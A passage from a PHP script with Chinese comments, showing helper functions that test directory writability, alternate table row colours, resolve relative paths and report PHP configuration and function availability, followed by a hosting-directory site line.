  705.            if ($fp = @fopen("$dir/test.txt", 'w')) {
  706.                @fclose($fp);
  707.                @unlink("$dir/test.txt");
  708.                $writeable = 1;
  709.            } else {
  710.                $writeable = 0;
  711.            }
  712.        }
  713.        return $writeable;
  714.    }
  715.    // 表格行间的背景色替换
  716.    function getrowbg() {
  717.        global $bgcounter;
  718.        if ($bgcounter++%2==0) {
  719.            return "firstalt";
  720.        } else {
  721.            return "secondalt";
  722.        }
  723.    }
  724.    // 获取当前的文件系统路径
  725.    function getPath($mainpath, $relativepath) {
  726.        global $dir;
  727.        $mainpath_info           = explode('/', $mainpath);
  728.        $relativepath_info       = explode('/', $relativepath);
  729.        $relativepath_info_count = count($relativepath_info);
  730.        for ($i=0; $i<$relativepath_info_count; $i++) {
  731.            if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
  732.            if ($relativepath_info[$i] == '..') {
  733.                $mainpath_info_count = count($mainpath_info);
  734.                unset($mainpath_info[$mainpath_info_count-1]);
  735.                continue;
  736.            }
  737.            $mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
  738.        } //end for
  739.        return implode('/', $mainpath_info);
  740.    }
  741.    // 检查PHP配置参数
  742.    function getphpcfg($varname) {
  743.        switch($result = get_cfg_var($varname)) {
  744.            case 0:
  745.            return No;
  746.            break;
  747.            case 1:
  748.            return Yes;
  749.            break;
  750.            default:
  751.            return $result;
  752.            break;
  753.        }
  754.    }
  755.    // 检查函数情况
  756.    function getfun($funName) {
  757.        return (false !== function_exists($funName)) ? Yes : No;
  758.    }
  759. ?>
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Jgwy.Com - Free Web Hosting Guide & Directory In China since 2001! Jgwy.Net-Jglt.Net

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